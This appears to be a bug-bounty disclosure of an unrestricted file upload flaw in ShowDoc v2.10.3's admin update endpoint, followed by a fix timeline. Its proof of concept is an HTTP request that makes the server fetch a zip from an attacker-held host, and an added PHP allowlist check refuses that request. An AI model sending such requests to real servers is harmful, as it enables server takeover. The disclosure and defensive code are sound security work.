There is an Unrestricted Upload of File vulnerability in ShowDoc v2.10.3 in star7th/showdoc

Valid

Reported on Mar 20th 2022


Description

There is an Unrestricted Upload of File vulnerability in AdminUpdateController.class.php in ShowDoc v2.10.3.

Proof of Concept

POST /showdoc-2.10.3/server/index.php?s=/api/adminUpdate/download HTTP/1.1
Host: 10.211.55.5
Content-Length: 66
Accept: application/json, text/plain, */*
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.80 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Origin: http://10.211.55.5
Referer: http://10.211.55.5/showdoc-2.10.3/web/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: PHPSESSID=47uvgq7efm1ethua6a8podcse6; think_language=zh-CN; cookie_token=09d404934af99f9a7cafad11e061df0c23fc785a28781b655a152a7b1eb43000
Connection: origin

new_version=666&file_url=http://192.168.1.7:88/showdoc-666.zip

Impact

After the attacker logs in to the admin panel, the vulnerability can be used to obtain server privileges.
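
A server-side check that would refuse the request shown in the proof of concept, as an added example that is not ShowDoc's code and not the fix from the project's commit: it pins the update download to an allowlisted HTTPS host and to the archive name for the requested version. The function name, the host `update.example.com` and the `/releases/` path layout are assumptions.

```php
<?php
// Added illustration, not ShowDoc code. The host, the path layout and the
// function name are assumptions made for this example.
const TRUSTED_UPDATE_HOSTS = ['update.example.com']; // hypothetical host

/** Return a canonical URL that is safe to download, otherwise throw. */
function validate_update_request(string $newVersion, string $fileUrl): string
{
    $p = parse_url($fileUrl);
    if (!is_array($p) || !isset($p['scheme'], $p['host'], $p['path'])) {
        throw new InvalidArgumentException('URL could not be parsed');
    }
    // HTTPS only, so the archive cannot be swapped in transit.
    if (strtolower($p['scheme']) !== 'https') {
        throw new InvalidArgumentException('scheme rejected');
    }
    // Exact host match; no credentials or alternate ports in the URL.
    $host = strtolower($p['host']);
    if (!in_array($host, TRUSTED_UPDATE_HOSTS, true)
        || isset($p['user']) || isset($p['pass']) || isset($p['port'])) {
        throw new InvalidArgumentException('host rejected');
    }
    // Accept dotted-digit versions only (for example 2.10.4).
    if (!preg_match('/^\d+(\.\d+){1,3}$/D', $newVersion)) {
        throw new InvalidArgumentException('version format rejected');
    }
    // The path must name the archive for exactly the requested version.
    $path = "/releases/showdoc-{$newVersion}.zip";
    if ($p['path'] !== $path) {
        throw new InvalidArgumentException('path rejected');
    }
    // Rebuild from validated parts so any query or fragment is dropped.
    return "https://{$host}{$path}";
}

// Constructed inputs: the parameter values from the request above, then a conforming pair.
$cases = [
    ['666', 'http://192.168.1.7:88/showdoc-666.zip'],
    ['2.10.4', 'https://update.example.com/releases/showdoc-2.10.4.zip'],
];
foreach ($cases as [$version, $url]) {
    try {
        $ok = validate_update_request($version, $url);
        echo "accepted: $ok\n";
    } catch (InvalidArgumentException $e) {
        echo "rejected: $url ({$e->getMessage()})\n";
    }
}
```

Allowlisting the source does not prove the archive is intact, so the downloaded file's digest should still be compared with a published value before extraction. The downloader should also have redirect following disabled, otherwise a trusted host can hand the request to an untrusted one.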

We are processing your report and will contact the star7th/showdoc team within 24 hours. (a year ago)
We have contacted a member of the star7th/showdoc team and are waiting to hear back. (a year ago)
star7th validated this vulnerability (a year ago)
Xiaoshui has been awarded the disclosure bounty
The fix bounty is now up for grabs
star7th marked this as fixed in 2.10.4 with commit bd792a (a year ago)
star7th has been awarded the fix bounty
This vulnerability will not receive a CVE